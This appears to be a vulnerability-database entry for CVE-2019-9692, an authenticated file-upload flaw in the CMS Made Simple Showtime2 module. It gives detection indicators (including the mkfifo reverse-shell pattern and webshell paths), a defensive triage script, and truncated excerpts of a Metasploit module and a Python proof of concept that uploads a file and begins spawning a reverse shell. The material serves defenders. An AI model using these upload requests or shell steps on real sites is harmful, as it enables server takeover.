CVE-2019-9692
Published 2019-03-11
Priority: P3 · 57
CVSS 3.0: 6.5 (medium), vector AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Exploit: public exploit available
EPSS: 46.52% (98.7th percentile)
class.showtime2_image.php in CMS Made Simple (CMSMS) before 2.2.10 does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG, or PNG).
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cmsmadesimple | cms_made_simple | < 2.2.10 | 2.2.10 |
Detection & IOCs (extracted from sources)
- Detect multipart POST requests to /admin/moduleinterface.php with mact=Showtime2 and m1_upload_submit=Upload; this is the file-upload request the exploit relies on.
- Alert on GET or POST requests to /uploads/images/*.php: a PHP file served from the image upload directory indicates a successfully placed webshell.
- Monitor for HTTP GET requests to /modules/Showtime2/moduleinfo.ini, which attackers use to fingerprint the Showtime2 module version before exploitation.
- Detect uploaded files with non-image extensions (e.g. .php, .php5, .phtml) in the watermark/upload path; the root cause is the missing extension validation in class.showtime2_image.php.
- Look for the named-pipe reverse shell pattern (mkfifo /tmp/f) in process execution logs on the web server; it is the default post-exploitation payload of the PoC.
- Showtime2 <= 3.6.2 on CMSMS <= 2.2.9.1 is confirmed vulnerable; check the version string in /modules/Showtime2/moduleinfo.ini for triage.
- Exploitation requires an authenticated session with the 'Use Showtime2' privilege; this is not an unauthenticated vulnerability.
- The Metasploit module uses a CSRF token extracted from the login redirect Location header; detections based solely on cookie presence may miss sessions that bypass login via stolen credentials.
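The signals in the list above, expressed as triage code over constructed request records. This is an added example, not part of this CVE record or of either exploit below; it assumes the decoded multipart fields and the uploaded file name are available from a WAF or proxy log, and `has_image_extension` reproduces the extension check the patched class.showtime2_image.php is described as performing.

```python
# Added example, not part of this CVE record or of either exploit listed below.
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Extensions the fixed class.showtime2_image.php accepts for a watermark file.
ALLOWED_IMAGE_EXT = {"gif", "jpg", "jpeg", "png"}
# PHP-like files (php, php5, phtml, ...) served from the image upload directory.
PHP_IN_UPLOADS = re.compile(r"^/uploads/images/.+\.(php\d?|phtml)$", re.I)

def has_image_extension(filename: str) -> bool:
    """The missing check behind CVE-2019-9692: accept a watermark only when its
    final extension is gif/jpg/jpeg/png (case-insensitive)."""
    name = filename.rsplit("/", 1)[-1]
    return "." in name and name.rsplit(".", 1)[1].lower() in ALLOWED_IMAGE_EXT

def classify_request(method: str, url: str, content_type: str = "",
                     form: Optional[Dict[str, str]] = None,
                     upload_name: str = "") -> List[str]:
    """Tag one request with the indicators listed above. `form` holds the decoded
    multipart fields and `upload_name` the uploaded file's name, as a WAF or
    proxy log would record them (an assumption of this example)."""
    form = form or {}
    path = urlsplit(url).path
    tags: List[str] = []
    if method == "GET" and path == "/modules/Showtime2/moduleinfo.ini":
        tags.append("showtime2_fingerprint")      # version probe before exploitation
    if (method == "POST" and path == "/admin/moduleinterface.php"
            and content_type.lower().startswith("multipart/form-data")
            and form.get("mact", "").startswith("Showtime2,")
            and form.get("m1_upload_submit") == "Upload"):
        tags.append("showtime2_upload_trigger")   # the upload the PoC abuses
        if upload_name and not has_image_extension(upload_name):
            tags.append("non_image_watermark")    # what the patched code rejects
    if PHP_IN_UPLOADS.match(path):
        tags.append("php_in_uploads")             # webshell being fetched
    return tags

# Constructed sample traffic: a fingerprint, a webshell upload, its retrieval, benign.
SAMPLE_REQUESTS = [
    ("GET", "/modules/Showtime2/moduleinfo.ini", "", None, ""),
    ("POST", "/admin/moduleinterface.php", "multipart/form-data; boundary=x",
     {"mact": "Showtime2,m1_,defaultadmin,0", "m1_upload_submit": "Upload"}, "shell.php"),
    ("GET", "/uploads/images/shell.php", "", None, ""),
    ("GET", "/uploads/images/photo.jpg", "", None, ""),
]

def triage(requests=SAMPLE_REQUESTS) -> List[List[str]]:
    """Classify each record; any non-empty tag list deserves an analyst's attention."""
    return [classify_request(*r) for r in requests]
```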
CVSS provenance
- NVD, CVSS v3.0: 6.5 MEDIUM (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N)
- NVD, CVSS v2.0: 4.0 MEDIUM (AV:N/AC:L/Au:S/C:N/I:P/A:N)
No detection rules found.
Exploit-DB: CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)
exploitdb · 2019-03-28
---
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  # (excerpt truncated in the source: the module rank, mixins and the start of
  #  initialize() are missing; only the metadata fragment below survives)
      'Name' => "CMS Made Simple (CMSMS) Showtime2 File Upload RCE",
      'Description' => %q(
        This module exploits a File Upload vulnerability that lead in a RCE in
        Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS).
      ),
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Daniele Scanu', # Discovery & PoC
          'Fabio Cogno'    # Metasploit module
        ],
      'References' =>
        [
          ['CVE', '2019-9692'],
          ['CWE', '434'],
          ['EDB', '46546'],
          ['URL', 'https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285'],
          ['URL', 'http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47']
        ],
      'Platform' =>
      # (excerpt truncated in the source)
```
Exploit-DB: CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload
exploitdb · 2019-03-15
---
```python
#!/usr/bin/env python
# Exploit Title: CMS Made Simple (authenticated) arbitrary file upload in Showtime2 module
# Date: March 2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtime2
# Version: Showtime2 module
# (excerpt truncated in the source: imports, argument handling, the login
#  request and the start of the multipart upload body are missing)
            ", 'text/plain'),
        '__c': __c_var,
        'mact': 'Showtime2,m1_,defaultadmin,0',
        'm1_upload_submit': 'Upload'
    }
)
response = session.post(base_uri + '/admin/moduleinterface.php', data=multipart_data,
                        headers={'Content-Type': multipart_data.content_type})

# Call the uploaded script to spawn a reverse shell
def spawn_shell():
    print "[*] Spawn a shell to " + lhost + ":" + str(lpo
# (excerpt truncated in the source)
```
Metasploit: CMS Made Simple (CMSMS) Showtime2 File Upload RCE
This module exploits a File Upload vulnerability that leads to RCE in the Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated user with the "Use Showtime2" privilege could exploit the vulnerability. The vulnerability exists in the Showtime2 module, where the class "class.showtime2_image.php" does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG, or PNG). Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1.
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/152269/CMS-Made-Simple-CMSMS-Showtime2-File-Upload-Remote-Command-Execution.html
- http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47
- http://www.rapid7.com/db/modules/exploit/multi/http/cmsms_showtime2_rce
- https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285
- https://www.exploit-db.com/exploits/46546/
- https://www.exploit-db.com/exploits/46627/